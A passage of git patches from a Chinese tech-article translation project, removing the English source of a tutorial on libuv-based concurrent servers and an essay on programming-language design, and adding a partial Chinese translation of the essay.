uv_strerror(status)); - return; - } - - // client will represent this peer; it's allocated on the heap and only - // released when the client disconnects. The client holds a pointer to - // peer_state_t in its data field; this peer state tracks the protocol state - // with this client throughout interaction. - uv_tcp_t* client = (uv_tcp_t*)xmalloc(sizeof(*client)); - int rc; - if ((rc = uv_tcp_init(uv_default_loop(), client)) < 0) { - die("uv_tcp_init failed: %s", uv_strerror(rc)); - } - client->data = NULL; - - if (uv_accept(server_stream, (uv_stream_t*)client) == 0) { - struct sockaddr_storage peername; - int namelen = sizeof(peername); - if ((rc = uv_tcp_getpeername(client, (struct sockaddr*)&peername, - &namelen)) < 0) { - die("uv_tcp_getpeername failed: %s", uv_strerror(rc)); - } - report_peer_connected((const struct sockaddr_in*)&peername, namelen); - - // Initialize the peer state for a new client: we start by sending the peer - // the initial '*' ack. - peer_state_t* peerstate = (peer_state_t*)xmalloc(sizeof(*peerstate)); - peerstate->state = INITIAL_ACK; - peerstate->sendbuf[0] = '*'; - peerstate->sendbuf_end = 1; - peerstate->client = client; - client->data = peerstate; - - // Enqueue the write request to send the ack; when it's done, - // on_wrote_init_ack will be called. The peer state is passed to the write - // request via the data pointer; the write request does not own this peer - // state - it's owned by the client handle. - uv_buf_t writebuf = uv_buf_init(peerstate->sendbuf, peerstate->sendbuf_end); - uv_write_t* req = (uv_write_t*)xmalloc(sizeof(*req)); - req->data = peerstate; - if ((rc = uv_write(req, (uv_stream_t*)client, &writebuf, 1, - on_wrote_init_ack)) < 0) { - die("uv_write failed: %s", uv_strerror(rc)); - } - } else { - uv_close((uv_handle_t*)client, on_client_closed); - } -} -``` - -This code is well commented, but there are a couple of important libuv idioms I'd like to highlight: - -* Passing custom data into callbacks: since C has no closures, this can be challenging. libuv has a void* datafield in all its handle types; these fields can be used to pass user data. For example, note how client->data is made to point to a peer_state_t structure so that the callbacks registered by uv_write and uv_read_start can know which peer data they're dealing with. - -* Memory management: event-driven programming is much easier in languages with garbage collection, because callbacks usually run in a completely different stack frame from where they were registered, making stack-based memory management difficult. It's almost always necessary to pass heap-allocated data to libuv callbacks (except in main, which remains alive on the stack when all callbacks run), and to avoid leaks much care is required about when these data are safe to free(). This is something that comes with a bit of practice [[1]][6]. - -The peer state for this server is: - -``` -typedef struct { - ProcessingState state; - char sendbuf[SENDBUF_SIZE]; - int sendbuf_end; - uv_tcp_t* client; -} peer_state_t; -``` - -It's fairly similar to the state in part 3; we no longer need sendptr, since uv_write will make sure to send the whole buffer it's given before invoking the "done writing" callback. We also keep a pointer to the client for other callbacks to use. Here's on_wrote_init_ack: - -``` -void on_wrote_init_ack(uv_write_t* req, int status) { - if (status) { - die("Write error: %s\n", uv_strerror(status)); - } - peer_state_t* peerstate = (peer_state_t*)req->data; - // Flip the peer state to WAIT_FOR_MSG, and start listening for incoming data - // from this peer. - peerstate->state = WAIT_FOR_MSG; - peerstate->sendbuf_end = 0; - - int rc; - if ((rc = uv_read_start((uv_stream_t*)peerstate->client, on_alloc_buffer, - on_peer_read)) < 0) { - die("uv_read_start failed: %s", uv_strerror(rc)); - } - - // Note: the write request doesn't own the peer state, hence we only free the - // request itself, not the state. - free(req); -} -``` - -Then we know for sure that the initial '*' was sent to the peer, we start listening to incoming data from this peer by calling uv_read_start, which registers a callback (on_peer_read) that will be invoked by the event loop whenever new data is received on the socket from the client: - -``` -void on_peer_read(uv_stream_t* client, ssize_t nread, const uv_buf_t* buf) { - if (nread < 0) { - if (nread != uv_eof) { - fprintf(stderr, "read error: %s\n", uv_strerror(nread)); - } - uv_close((uv_handle_t*)client, on_client_closed); - } else if (nread == 0) { - // from the documentation of uv_read_cb: nread might be 0, which does not - // indicate an error or eof. this is equivalent to eagain or ewouldblock - // under read(2). - } else { - // nread > 0 - assert(buf->len >= nread); - - peer_state_t* peerstate = (peer_state_t*)client->data; - if (peerstate->state == initial_ack) { - // if the initial ack hasn't been sent for some reason, ignore whatever - // the client sends in. - free(buf->base); - return; - } - - // run the protocol state machine. - for (int i = 0; i < nread; ++i) { - switch (peerstate->state) { - case initial_ack: - assert(0 && "can't reach here"); - break; - case wait_for_msg: - if (buf->base[i] == '^') { - peerstate->state = in_msg; - } - break; - case in_msg: - if (buf->base[i] == '$') { - peerstate->state = wait_for_msg; - } else { - assert(peerstate->sendbuf_end < sendbuf_size); - peerstate->sendbuf[peerstate->sendbuf_end++] = buf->base[i] + 1; - } - break; - } - } - - if (peerstate->sendbuf_end > 0) { - // we have data to send. the write buffer will point to the buffer stored - // in the peer state for this client. - uv_buf_t writebuf = - uv_buf_init(peerstate->sendbuf, peerstate->sendbuf_end); - uv_write_t* writereq = (uv_write_t*)xmalloc(sizeof(*writereq)); - writereq->data = peerstate; - int rc; - if ((rc = uv_write(writereq, (uv_stream_t*)client, &writebuf, 1, - on_wrote_buf)) < 0) { - die("uv_write failed: %s", uv_strerror(rc)); - } - } - } - free(buf->base); -} -``` - -The runtime behavior of this server is very similar to the event-driven servers of part 3: all clients are handled concurrently in a single thread. Also similarly, a certain discipline has to be maintained in the server's code: the server's logic is implemented as an ensemble of callbacks, and long-running operations are a big no-no since they block the event loop. Let's explore this issue a bit further. - -### Long-running operations in event-driven loops - -The single-threaded nature of event-driven code makes it very susceptible to a common issue: long-running code blocks the entire loop. Consider this program: - -``` -void on_timer(uv_timer_t* timer) { - uint64_t timestamp = uv_hrtime(); - printf("on_timer [%" PRIu64 " ms]\n", (timestamp / 1000000) % 100000); - - // "Work" - if (random() % 5 == 0) { - printf("Sleeping...\n"); - sleep(3); - } -} - -int main(int argc, const char** argv) { - uv_timer_t timer; - uv_timer_init(uv_default_loop(), &timer); - uv_timer_start(&timer, on_timer, 0, 1000); - return uv_run(uv_default_loop(), UV_RUN_DEFAULT); -} -``` - -It runs a libuv event loop with a single registered callback: on_timer, which is invoked by the loop every second. The callback reports a timestamp, and once in a while simulates some long-running task by sleeping for 3 seconds. Here's a sample run: - -``` -$ ./uv-timer-sleep-demo -on_timer [4840 ms] -on_timer [5842 ms] -on_timer [6843 ms] -on_timer [7844 ms] -Sleeping... -on_timer [11845 ms] -on_timer [12846 ms] -Sleeping... -on_timer [16847 ms] -on_timer [17849 ms] -on_timer [18850 ms] -... -``` - -on_timer dutifully fires every second, until the random sleep hits in. At that point, on_timer is not invoked again until the sleep is over; in fact,  _no other callbacks_  will be invoked in this time frame. The sleep call blocks the current thread, which is the only thread involved and is also the thread the event loop uses. When this thread is blocked, the event loop is blocked. - -This example demonstrates why it's so important for callbacks to never block in event-driven calls, and applies equally to Node.js servers, client-side Javascript, most GUI programming frameworks, and many other asynchronous programming models. - -But sometimes running time-consuming tasks is unavoidable. Not all tasks have asynchronous APIs; for example, we may be dealing with some library that only has a synchronous API, or just have to perform a potentially long computation. How can we combine such code with event-driven programming? Threads to the rescue! - -### Threads for "converting" blocking calls into asynchronous calls - -A thread pool can be used to turn blocking calls into asynchronous calls, by running alongside the event loop and posting events onto it when tasks are completed. Here's how it works, for a given blocking function do_work(): - -1. Instead of directly calling do_work() in a callback, we package it into a "task" and ask the thread pool to execute the task. We also register a callback for the loop to invoke when the task has finished; let's call iton_work_done(). - -2. At this point our callback can return and the event loop keeps spinning; at the same time, a thread in the pool is executing the task. - -3. Once the task has finished executing, the main thread (the one running the event loop) is notified and on_work_done() is invoked by the event loop. - -Let's see how this solves our previous timer/sleep example, using libuv's work scheduling API: - -``` -void on_after_work(uv_work_t* req, int status) { - free(req); -} - -void on_work(uv_work_t* req) { - // "Work" - if (random() % 5 == 0) { - printf("Sleeping...\n"); - sleep(3); - } -} - -void on_timer(uv_timer_t* timer) { - uint64_t timestamp = uv_hrtime(); - printf("on_timer [%" PRIu64 " ms]\n", (timestamp / 1000000) % 100000); - - uv_work_t* work_req = (uv_work_t*)malloc(sizeof(*work_req)); - uv_queue_work(uv_default_loop(), work_req, on_work, on_after_work); -} - -int main(int argc, const char** argv) { - uv_timer_t timer; - uv_timer_init(uv_default_loop(), &timer); - uv_timer_start(&timer, on_timer, 0, 1000); - return uv_run(uv_default_loop(), UV_RUN_DEFAULT); -} -``` - -Instead of calling sleep directly in on_timer, we enqueue a task, represented by a handle of type work_req [[2]][14], the function to run in the task (on_work) and the function to invoke once the task is completed (on_after_work). on_workis where the "work" (the blocking/time-consuming operation) happens. Note a crucial difference between the two callbacks passed into uv_queue_work: on_work runs in the thread pool, while on_after_work runs on the main thread which also runs the event loop - just like any other callback. - -Let's see this version run: - -``` -$ ./uv-timer-work-demo -on_timer [89571 ms] -on_timer [90572 ms] -on_timer [91573 ms] -on_timer [92575 ms] -Sleeping... -on_timer [93576 ms] -on_timer [94577 ms] -Sleeping... -on_timer [95577 ms] -on_timer [96578 ms] -on_timer [97578 ms] -... -``` - -The timer ticks every second, even though the sleeping function is still invoked; sleeping is now done on a separate thread and doesn't block the event loop. - -### A primality-testing server, with exercises - -Since sleep isn't a very exciting way to simulate work, I've prepared a more comprehensive example - a server that accepts numbers from clients over a socket, checks whether these numbers are prime and sends back either "prime" or "composite". The full [code for this server is here][15] - I won't post it here since it's long, but will rather give readers the opportunity to explore it on their own with a couple of exercises. - -The server deliberatly uses a naive primality test algorithm, so for large primes it can take quite a while to return an answer. On my machine it takes ~5 seconds to compute the answer for 2305843009213693951, but YMMV. - -Exercise 1: the server has a setting (via an environment variable named MODE) to either run the primality test in the socket callback (meaning on the main thread) or in the libuv work queue. Play with this setting to observe the server's behavior when multiple clients are connecting simultaneously. In blocking mode, the server will not answer other clients while it's computing a big task; in non-blocking mode it will. - -Exercise 2: libuv has a default thread-pool size, and it can be configured via an environment variable. Can you use multiple clients to discover experimentally what the default size is? Having found the default thread-pool size, play with different settings to see how it affects the server's responsiveness under heavy load. - -### Non-blocking file-system operations using work queues - -Delegating potentially-blocking operations to a thread pool isn't good for just silly demos and CPU-intensive computations; libuv itself makes heavy use of this capability in its file-system APIs. This way, libuv accomplishes the superpower of exposing the file-system with an asynchronous API, in a portable way. - -Let's take uv_fs_read(), for example. This function reads from a file (represented by a uv_fs_t handle) into a buffer [[3]][16], and invokes a callback when the reading is completed. That is, uv_fs_read() always returns immediately, even if the file sits on an NFS-like system and it may take a while for the data to get to the buffer. In other words, this API is asynchronous in the way other libuv APIs are. How does this work? - -At this point we're going to look under the hood of libuv; the internals are actually fairly straightforward, and it's a good exercise. Being a portable library, libuv has different implementations of many of its functions for Windows and Unix systems. We're going to be looking at src/unix/fs.c in the libuv source tree. - -The code for uv_fs_read is: - -``` -int uv_fs_read(uv_loop_t* loop, uv_fs_t* req, - uv_file file, - const uv_buf_t bufs[], - unsigned int nbufs, - int64_t off, - uv_fs_cb cb) { - if (bufs == NULL || nbufs == 0) - return -EINVAL; - - INIT(READ); - req->file = file; - - req->nbufs = nbufs; - req->bufs = req->bufsml; - if (nbufs > ARRAY_SIZE(req->bufsml)) - req->bufs = uv__malloc(nbufs * sizeof(*bufs)); - - if (req->bufs == NULL) { - if (cb != NULL) - uv__req_unregister(loop, req); - return -ENOMEM; - } - - memcpy(req->bufs, bufs, nbufs * sizeof(*bufs)); - - req->off = off; - POST; -} -``` - -It may seem puzzling at first, because it defers the real work to the INIT and POST macros, with some local variable setup for POST. This is done to avoid too much code duplication within the file. - -The INIT macro is: - -``` -#define INIT(subtype) \ - do { \ - req->type = UV_FS; \ - if (cb != NULL) \ - uv__req_init(loop, req, UV_FS); \ - req->fs_type = UV_FS_ ## subtype; \ - req->result = 0; \ - req->ptr = NULL; \ - req->loop = loop; \ - req->path = NULL; \ - req->new_path = NULL; \ - req->cb = cb; \ - } \ - while (0) -``` - -It sets up the request, and most importantly sets the req->fs_type field to the actual FS request type. Since uv_fs_read invokes INIT(READ), it means req->fs_type gets assigned the constant UV_FS_READ. - -The POST macro is: - -``` -#define POST \ - do { \ - if (cb != NULL) { \ - uv__work_submit(loop, &req->work_req, uv__fs_work, uv__fs_done); \ - return 0; \ - } \ - else { \ - uv__fs_work(&req->work_req); \ - return req->result; \ - } \ - } \ - while (0) -``` - -What it does depends on whether the callback is NULL. In libuv file-system APIs, a NULL callback means we actually want to perform the operation  _synchronously_ . In this case POST invokes uv__fs_work directly (we'll get to what this function does in just a bit), whereas for a non-NULL callback, it submits uv__fs_work as a work item to the work queue (which is the thread pool), and registers uv__fs_done as the callback; that function does a bit of book-keeping and invokes the user-provided callback. - -If we look at the code of uv__fs_work, we'll see it uses more macros to route work to the actual file-system call as needed. In our case, for UV_FS_READ the call will be made to uv__fs_read, which (at last!) does the reading using regular POSIX APIs. This function can be safely implemented in a  _blocking_  manner, since it's placed on a thread-pool when called through the asynchronous API. - -In Node.js, the fs.readFile function is mapped to uv_fs_read. Thus, reading files can be done in a non-blocking fashion even though the underlying file-system API is blocking. - -* * * - - -[[1]][1] To ensure that this server doesn't leak memory, I ran it under Valgrind with the leak checker enabled. Since servers are often designed to run forever, this was a bit challenging; to overcome this issue I've added a "kill switch" to the server - a special sequence received from a client makes it stop the event loop and exit. The code for this is in theon_wrote_buf handler. - - -[[2]][2] Here we don't use work_req for much; the primality testing server discussed next will show how it's used to pass context information into the callback. - - -[[3]][3] uv_fs_read() provides a generalized API similar to the preadv Linux system call: it takes multiple buffers which it fills in order, and supports an offset into the file. We can ignore these features for the sake of our discussion. - - --------------------------------------------------------------------------------- - -via: https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/ - -作者:[Eli Bendersky ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://eli.thegreenplace.net/ -[1]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id1 -[2]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id2 -[3]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id3 -[4]:https://eli.thegreenplace.net/tag/concurrency -[5]:https://eli.thegreenplace.net/tag/c-c -[6]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id4 -[7]:http://eli.thegreenplace.net/2017/concurrent-servers-part-1-introduction/ -[8]:http://eli.thegreenplace.net/2017/concurrent-servers-part-2-threads/ -[9]:http://eli.thegreenplace.net/2017/concurrent-servers-part-3-event-driven/ -[10]:http://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/ -[11]:http://eli.thegreenplace.net/2017/concurrent-servers-part-3-event-driven/ -[12]:http://libuv.org/ -[13]:https://github.com/eliben/code-for-blog/blob/master/2017/async-socket-server/uv-server.c -[14]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id5 -[15]:https://github.com/eliben/code-for-blog/blob/master/2017/async-socket-server/uv-isprime-server.c -[16]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id6 -[17]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/ diff --git a/translated/tech/20171109 Concurrent Servers- Part 4 - libuv.md b/translated/tech/20171109 Concurrent Servers- Part 4 - libuv.md index b4db491e4e..07994c67b1 100644 --- a/translated/tech/20171109 Concurrent Servers- Part 4 - libuv.md +++ b/translated/tech/20171109 Concurrent Servers- Part 4 - libuv.md @@ -490,3 +490,4 @@ via: https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/ [15]:https://github.com/eliben/code-for-blog/blob/master/2017/async-socket-server/uv-isprime-server.c [16]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/#id6 [17]:https://eli.thegreenplace.net/2017/concurrent-servers-part-4-libuv/ + From 300061d988e7dafcc09761d000a98d6f5fc8b7a1 Mon Sep 17 00:00:00 2001 From: Valonia Kim <34000495+Valoniakim@users.noreply.github.com> Date: Mon, 4 Dec 2017 15:55:46 +0800 Subject: [PATCH 0232/1627] Delete 20171118 Language engineering for great justice.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 删除源文件 --- ... Language engineering for great justice.md | 60 ------------------- 1 file changed, 60 deletions(-) delete mode 100644 sources/tech/20171118 Language engineering for great justice.md diff --git a/sources/tech/20171118 Language engineering for great justice.md b/sources/tech/20171118 Language engineering for great justice.md deleted file mode 100644 index 35d9bd854f..0000000000 --- a/sources/tech/20171118 Language engineering for great justice.md +++ /dev/null @@ -1,60 +0,0 @@ -Translating by ValoniaKim -Language engineering for great justice -============================================================ - -Whole-systems engineering, when you get good at it, goes beyond being entirely or even mostly about technical optimizations. Every artifact we make is situated in a context of human action that widens out to the economics of its use, the sociology of its users, and the entirety of what Austrian economists call “praxeology”, the science of purposeful human behavior in its widest scope. - -This isn’t just abstract theory for me. When I wrote my papers on open-source development, they were exactly praxeology – they weren’t about any specific software technology or objective but about the context of human action within which technology is worked. An increase in praxeological understanding of technology can reframe it, leading to tremendous increases in human productivity and satisfaction, not so much because of changes in our tools but because of changes in the way we grasp them. - -In this, the third of my unplanned series of posts about the twilight of C and the huge changes coming as we actually begin to see forward into a new era of systems programming, I’m going to try to cash that general insight out into some more specific and generative ideas about the design of computer languages, why they succeed, and why they fail. - -In my last post I noted that every computer language is an embodiment of a relative-value claim, an assertion about the optimal tradeoff between spending machine resources and spending programmer time, all of this in a context where the cost of computing power steadily falls over time while programmer-time costs remain relatively stable or may even rise. I also highlighted the additional role of transition costs in pinning old tradeoff assertions into place. I described what language designers do as seeking a new optimum for present and near-future conditions. - -Now I’m going to focus on that last concept. A language designer has lots of possible moves in language-design space from where the state of the art is now. What kind of type system? GC or manual allocation? What mix of imperative, functional, or OO approaches? But in praxeological terms his choice is, I think, usually much simpler: attack a near problem or a far problem? - -“Near” and “far” are measured along the curves of falling hardware costs, rising software complexity, and increasing transition costs from existing languages. A near problem is one the designer can see right in front of him; a far problem is a set of conditions that can be seen coming but won’t necessarily arrive for some time. A near solution can be deployed immediately, to great practical effect, but may age badly as conditions change. A far solution is a bold bet that may smother under the weight of its own overhead before its future arrives, or never be adopted at all because moving to it is too expensive. - -Back at the dawn of computing, FORTRAN was a near-problem design, LISP a far-problem one. Assemblers are near solutions. Illustrating that the categories apply to non-general-purpose languages, also roff markup. Later in the game, PHP and Javascript. Far solutions? Oberon. Ocaml. ML. XML-Docbook. Academic languages tend to be far because the incentive structure around them rewards originality and intellectual boldness (note that this is a praxeological cause, not a technical one!). The failure mode of academic languages is predictable; high inward transition costs, nobody goes there, failure to achieve community critical mass sufficient for mainstream adoption, isolation, and stagnation. (That’s a potted history of LISP in one sentence, and I say that as an old LISP-head with a deep love for the language…) - -The failure modes of near designs are uglier. The best outcome to hope for is a graceful death and transition to a newer design. If they hang on (most likely to happen when transition costs out are high) features often get piled on them to keep them relevant, increasing complexity until they become teetering piles of cruft. Yes, C++, I’m looking at you. You too, Javascript. And (alas) Perl, though Larry Wall’s good taste mitigated the problem for many years – but that same good taste eventually moved him to blow up the whole thing for Perl 6. - -This way of thinking about language design encourages reframing the designer’s task in terms of two objectives. (1) Picking a sweet spot on the near-far axis away from you into the projected future; and (2) Minimizing inward transition costs from one or more existing languages so you co-opt their userbases. And now let’s talk about about how C took over the world. - -There is no more more breathtaking example than C than of nailing the near-far sweet spot in the entire history of computing. All I need to do to prove this is point at its extreme longevity as a practical, mainstream language that successfully saw off many competitors for its roles over much of its range. That timespan has now passed about 35 years (counting from when it swamped its early competitors) and is not yet with certainty ended. - -OK, you can attribute some of C’s persistence to inertia if you want, but what are you really adding to the explanation if you use the word “inertia”? What it means is exactly that nobody made an offer that actually covered the transition costs out of the language! - -Conversely, an underappreciated strength of the language was the low inward transition costs. C is an almost uniquely protean tool that, even at the beginning of its long reign, could readily accommodate programming habits acquired from languages as diverse as FORTRAN, Pascal, assemblers and LISP. I noticed back in the 1980s that I could often spot a new C programmer’s last language by his coding style, which was just the flip side of saying that C was damn good at gathering all those tribes unto itself. - -C++ also benefited from having low transition costs in. Later, most new languages at least partly copied C syntax in order to minimize them.Notice what this does to the context of future language designs: it raises the value of being a C-like as possible in order to minimize inward transition costs from anywhere. - -Another way to minimize inward transition costs is to simply be ridiculously easy to learn, even to people with no prior programming experience. This, however, is remarkably hard to pull off. I evaluate that only one language – Python – has made the major leagues by relying on this quality. I mention it only in passing because it’s not a strategy I expect to see a  _systems_  language execute successfully, though I’d be delighted to be wrong about that. - -So here we are in late 2017, and…the next part is going to sound to some easily-annoyed people like Go advocacy, but it isn’t. Go, itself, could turn out to fail in several easily imaginable ways. It’s troubling that the Go team is so impervious to some changes their user community is near-unanimously and rightly (I think) insisting it needs. Worst-case GC latency, or the throughput sacrifices made to lower it, could still turn out to drastically narrow the language’s application range. - -That said, there is a grand strategy expressed in the Go design that I think is right. To understand it, we need to review what the near problem for a C replacement is. As I noted in the prequels, it is rising defect rates as systems projects scale up – and specifically memory-management bugs because that category so dominates crash bugs and security exploits. - -We’ve now identified two really powerful imperatives for a C replacement: (1) solve the memory-management problem, and (2) minimize inward-transition costs from C. And the history – the praxeological context – of programming languages tells us that if a C successor candidate don’t address the transition-cost problem effectively enough, it almost doesn’t matter how good a job it does on anything else. Conversely, a C successor that  _does_  address transition costs well buys itself a lot of slack for not being perfect in other ways. - -This is what Go does. It’s not a theoretical jewel; it has annoying limitations; GC latency presently limits how far down the stack it can be pushed. But what it is doing is replicating the Unix/C infective strategy of being easy-entry and  _good enough_  to propagate faster than alternatives that, if it didn’t exist, would look like better far bets. - -Of course, the proboscid in the room when I say that is Rust. Which is, in fact, positioning itself as the better far bet. I’ve explained in previous installments why I don’t think it’s really ready to compete yet. The TIOBE and PYPL indices agree; it’s never made the TIOBE top 20 and on both indices does quite poorly against Go. - -Where Rust will be in five years is a different question, of course. My advice to the Rust community, if they care, is to pay some serious attention to the transition-cost problem. My personal experience says the C to Rust energy barrier is  _[nasty][2]_ . Code-lifting tools like Corrode won’t solve it if all they do is map C to unsafe Rust, and if there were an easy way to automate ownership/lifetime annotations they wouldn’t be needed at all – the compiler would just do that for you. I don’t know what a solution would look like, here, but I think they better find one. - -I will finally note that Ken Thompson has a history of designs that look like minimal solutions to near problems but turn out to have an amazing quality of openness to the future, the capability to  _be improved_ . Unix is like this, of course. It makes me very cautious about supposing that any of the obvious annoyances in Go that look like future-blockers to me (like, say, the lack of generics) actually are. Because for that to be true, I’d have to be smarter than Ken, which is not an easy thing to believe. - --------------------------------------------------------------------------------- - -via: http://esr.ibiblio.org/?p=7745 - -作者:[Eric Raymond ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://esr.ibiblio.org/?author=2 -[1]:http://esr.ibiblio.org/?author=2 -[2]:http://esr.ibiblio.org/?p=7711&cpage=1#comment-1913931 -[3]:http://esr.ibiblio.org/?p=7745 From 2f61d8d46e7cb305422db648c8d6eb47cb73cd74 Mon Sep 17 00:00:00 2001 From: Valonia Kim <34000495+Valoniakim@users.noreply.github.com> Date: Mon, 4 Dec 2017 16:02:20 +0800 Subject: [PATCH 0233/1627] Create Language engineering for great justice Translated by ValoniaK --- .../Language engineering for great justice | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 translated/tech/Language engineering for great justice diff --git a/translated/tech/Language engineering for great justice b/translated/tech/Language engineering for great justice new file mode 100644 index 0000000000..d26f9319bd --- /dev/null +++ b/translated/tech/Language engineering for great justice @@ -0,0 +1,24 @@ +最合理的语言工程模式 +当你熟练掌握一体化工程技术时,你就会发现它逐渐超过了技术优化的层面。我们制作的每件手工艺品都在一个大环境背景下,在这个环境中,人类的行为逐渐突破了经济意义,社会学意义,达到了奥地利经济学家所称的“人类行为学”,这是目的明确的人类行为所能达到的最大范围。 +对我来说这并不只是抽象理论。当我在开源发展项目中编写时,我的行为就十分符合人类行为学的理论,这行为不是针对任何特定的软件技术或某个客观事物,它指的是在开发科技的过程中人类行为的背景环境。从人类行为学角度对科技进行的解读不断增加,大量的这种解读可以重塑科技框架,带来人类生产力和满足感的极大幅度增长,而这并不是由于我们换了工具,而是在于我们改变了掌握它们的方式。 +在这个背景下,我在第三篇额外的文章中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统编程的新时代的到来,在这个时刻,我决定把我之前有的大体的预感具象化为更加具体的,更实用的点子,它们主要是关于计算机语言设计的分析,例如为什么他们会成功,或为什么他们会失败。 +在我最近的一篇文章中,我写道:所有计算机语言都是对机器资源的成本和程序员工作成本的相对权衡的结果,和对其相对价值的体现。这些都是在一个计算能力成本不断下降但程序员工作成本不减反增的背景下产生的。我还强调了转化成本在使原有交易主张适用于当下环境中的新增角色。在文中我将编程人员描述为一个寻找今后最适方案的探索者。 +现在我要讲一讲最后一点。以现有水平为起点,一个语言工程师有极大可能通过多种方式推动语言设计的发展。通过什么系统呢? GC 还是人工分配?使用何种配置,命令式语言,函数程式语言或是面向对象语言?但是从人类行为学的角度来说,我认为它的形式会更简洁,也许只是选择解决长期问题还是短期问题? +所谓的“远”“近”之分,是指硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据它们的变化曲线所做出的判断。短期问题指编程人员眼下发现的问题,长期问题指可预见的一系列情况,但它们一段时间内不会到来。针对近期问题所做出的部署需要非常及时且有效,但随着情况的变化,短期解决方案有可能很快就不适用了。而长期的解决方案可能因其过于超前而夭折,或因其代价过高无法被接受。 +在计算机刚刚面世的时候, FORTRAN 是近期亟待解决的问题, LISP 是远期问题。汇编语言是短期解决方案,图解说明非通用语言的分类应用,还有关门电阻不断上涨的成本。随着计算机技术的发展,PHP 和 Javascript逐渐应用于游戏中。至于长期的解决方案? Oberon , Ocaml , ML , XML-Docbook 都可以。 他们形成的激励机制带来了大量具有突破性和原创性的想法,事态蓬勃但未形成体系,那个时候距离专业语言的面世还很远,(值得注意的是这些想法的出现都是人类行为学中的因果,并非由于某种技术)。专业语言会失败,这是显而易见的,它的转入成本高昂,让大部分人望而却步,因此不能没能达到能够让主流群体接受的水平,被孤立,被搁置。这也是 LISP 不为人知的的过去,作为前 LISP 管理层人员,出于对它深深的爱,我为你们讲述了这段历史。 +如果短期解决方案出现故障,它的后果更加惨不忍睹,最好的结果是期待一个相对体面的失败,好转换到另一个设计方案。(通常在转化成本较高时)如果他们执意继续,通常造成众多方案相互之间藕断丝连,形成一个不断扩张的复合体,一直维持到不能运转下去,变成一堆摇摇欲坠的杂物。是的,我说的就是 C++ 语言,还有 Java 描述语言,(唉)还有 Perl,虽然 Larry Wall 的好品味成功地让他维持了很多年,问题一直没有爆发,但在 Perl 6 发行时,他的好品味最终引爆了整个问题。 +这种思考角度激励了编程人员向着两个不同的目的重新塑造语言设计: ①以远近为轴,在自身和预计的未来之间选取一个最适点,然后 ②降低由一种或多种语言转化为自身语言的转入成本,这样你就可以吸纳他们的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。 +在整个计算机发展史中,没有谁能比 C 语言完美地把握最适点的选取了,我要做的只是证明这一点,作为一种实用的主流语言, C 语言有着更长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来C语言的终结仍旧不会到来。 +当然,如果你愿意的话,可以把 C 语言的持久存在归功于人类的文化惰性,但那是对“文化惰性”这个词的曲解, C 语言一直得以延续的真正原因是没有人提供足够的转化费用! +相反的, C 语言低廉的内部转化费用未得到应有的重视,C 语言是如此的千变万化,从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN , Pascal , 汇编语言和 LISP 的编程习惯。在二十世纪八十年代我就注意到,我可以根据编程人员的编码风格判断出他的母语是什么,这也从另一方面证明了C 语言的魅力能够吸引全世界的人使用它。 +C++ 语言同样胜在它低廉的转化费用。很快,大部分新兴的语言为了降低自身转化费用,纷纷参考 C 语言语法。请注意这给未来的语言设计环境带来了什么影响:它尽可能地提高了 C-like 语言的价值,以此来降低其他语言转化为 C 语言的转化成本。 +另一种降低转入成本的方法十分简单,即使没接触过编程的人都能学会,但这种方法很难完成。我认为唯一使用了这种方法的 Python就是靠这种方法进入了职业比赛。对这个方法我一带而过,是因为它并不是我希望看到的,顺利执行的系统语言战略,虽然我很希望它不是那样的。 +今天我们在2017年年底聚集在这里,下一项我们应该为某些暴躁的团体发声,如 Go 团队,但事实并非如此。 Go 这个项目漏洞百出,我甚至可以想象出它失败的各种可能,Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出改变了,Go 团队也无动于衷,这是个大问题。 一旦发生故障, GC 发生延迟或者用牺牲生产量来弥补延迟,但无论如何,它都会严重影响到这种语言的应用,大幅缩小这种语言的适用范围。 +即便如此,在 Go 的设计中,还是有一个我颇为认同的远大战略目标,想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。同我之前提到的,随着项目计划的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理一直是崩溃漏洞和安全漏洞的高发领域。 +我们现在已经知道了两件十分中重要的紧急任务,要想取代 C 语言,首先要先做到这两点:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。纵观编程语言的历史——从人类行为学的角度来看,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那他们所做的其他部分做得再好都不算数。相反的,如果他们把转入成本过高这个问题解决地很好,即使他们其他部分做的不是最好的,人们也不会对他们吹毛求疵。 +这正是 Go 的做法,但这个理论并不是完美无瑕的,它也有局限性。目前 GC 延迟限制了它的发展,但 Go 现在选择照搬 Unix 下 C 语言的传染战略,让自身语言变成易于转入,便于传播的语言,其繁殖速度甚至快于替代品。但从长远角度看,这并不是个好办法。 +当然, Rust 